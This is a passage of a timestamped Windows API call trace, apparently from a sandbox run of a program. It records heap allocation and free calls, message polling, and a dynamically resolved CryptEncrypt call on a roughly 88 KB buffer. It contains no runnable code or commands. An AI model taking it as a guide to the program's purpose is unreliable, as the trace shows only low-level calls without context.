hHeap=0x970000) returned 1 [0137.027] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0137.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0137.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0137.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0137.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0137.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0137.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0137.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0137.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0137.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0137.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0137.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0137.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0137.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0137.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50a28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0137.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0137.064] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0137.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0137.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0137.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0137.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0137.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0137.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0137.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0137.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0137.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0137.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0137.065] CryptEncrypt (in: hKey=0xa87510, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x15985, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x15988) returned 1 [0137.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0137.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0137.065] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0137.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0137.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0137.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0137.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0137.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0137.065] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.066] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0137.066] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0137.066] CharLowerBuffW (in: lpsz="byte[88456]", cchLength=0xb | out: lpsz="byte[88456]") returned 0xb [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0137.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0137.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0137.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15988) returned 0x2ea5cc8 [0137.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0137.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0137.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0137.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0137.069] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0137.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0137.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0137.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0137.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0137.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0137.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0137.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0137.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0137.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0137.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0137.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0137.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15985) returned 0x2ebb658 [0137.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0137.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15985) returned 0x2ed0fe8 [0137.075] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0137.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0137.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0137.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0137.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0137.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0137.075] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0137.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0137.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0137.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0137.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0137.075] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0137.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0137.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0137.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0137.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0137.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0137.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0137.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0137.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0137.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0137.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0137.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0137.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0137.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0137.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0137.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0137.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0137.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0137.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0137.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0137.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0137.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0137.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0137.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0137.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0137.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0137.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0137.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0137.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0137.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0137.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0137.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0137.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0137.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0137.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0137.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0137.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0137.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0137.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0137.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0137.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0137.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0137.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0137.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0137.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0137.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0137.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0137.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0137.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0137.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0137.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0137.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0137.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0137.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0137.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0137.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0137.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0137.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0137.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0137.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0137.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0137.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0137.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0137.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0137.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0137.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0137.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0137.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0137.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0137.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15985) returned 0x2ebb658 [0137.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0137.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ebb658 | out: hHeap=0x970000) returned 1 [0137.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0137.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0137.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0137.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0137.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0137.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0137.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0137.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0137.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0137.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0137.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0137.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0137.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0137.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0137.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0137.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0137.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0137.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0137.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0137.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0137.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0137.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0137.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0137.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0137.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0137.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0137.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0137.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0137.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0137.082] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0137.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0137.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0137.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0137.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0137.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0137.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0137.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0137.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0137.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0137.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0137.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0137.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0137.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0137.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0137.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0137.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0137.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0137.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0137.082] RtlAllocateHeap 